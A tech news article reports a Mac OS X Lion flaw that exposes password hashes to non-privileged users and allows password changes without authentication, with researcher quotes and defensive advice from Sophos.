We use cookies to provide you with a better experience. If you continue to use this site, we'll assume you're happy with this. Alternatively, click here to find out how to manage these cookies

hide cookie message
80,259 News Articles

Mac OS X Lion flaw could see hackers changing passwords

Password hash can be seen by non-privileged users

A flaw in Apple's Mac OS X Lion could allow hackers to change passwords, says security researchers.

According to the Defense in Depth the operating system stores password in Shadow files, which can only be accessed by a high-privilege user such as an administrator. However, unlike previous versions of Mac OS X, Lion gives non-privileged users the ability to view the pass hash. Hackers could then subsequently change the passwords themselves as the "Directory Services in Lion no longer requires authentication when requesting a password change for the current user".

"Due to Lion's relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes ," said Patrick Dunstan on the blog adding that hackers don't need to "crack hashes when you can just change the password directly!"

"Whilst the ability to change the currently active user's password is not a privilege escalation flaw per se, it can under some circumstances be used for these purposes."

According to Chester Wisniewski from ssecurity firm Sophos www.sophos.co.uk the flaw is particularly dangerous for those using Apple's new FileVault 2 disk encryption.

"If your Mac were left unlocked and someone changed your password you would no longer be able to boot your computer and potentially would lose access to all of your data," he said on a blog.

Wisniewski advised those affected to disable automatic log-on and never leave a machine logged-in and unattended. Furthermore, Mac OS X Lion users should also use the Keychain lock to secure a screen and enable the screensaver, setting it to prompt users for a password.

IDG UK Sites

Best camera phone of 2015: iPhone 6 Plus vs LG G4 vs Galaxy S6 vs One M9 vs Nexus 6

IDG UK Sites

In defence of BlackBerrys

IDG UK Sites

Why we should reserve judgement on Apple ditching Helvetica in OS X/iOS for the Apple Watch's San...

IDG UK Sites

Retina 3.3GHz iMac 27in preview: Apple cuts £400 of price of Retina iMac with new model